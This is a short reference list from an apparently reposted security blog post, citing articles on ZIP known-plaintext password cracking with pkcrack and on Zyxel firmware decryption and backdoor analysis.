References (PDF):
- 使用pkcrack明文方式破解zip压缩文件密码 (cracking zip file passwords with pkcrack's known-plaintext mode), 张东南的博客, CSDN
- 用维阵还原 Zyxel 后门漏洞 (reproducing the Zyxel backdoor vulnerability with 维阵)
- USG310 4.70 固件解密分析 (USG310 4.70 firmware decryption analysis), CTF+
- ZIP已知明文攻击深入利用 (in-depth exploitation of the ZIP known-plaintext attack), FreeBuf (in my view the most complete summary of the known-plaintext attack)
- Zyxel firmware extraction and password analysis, hn security
Reposted from: iotsec-zone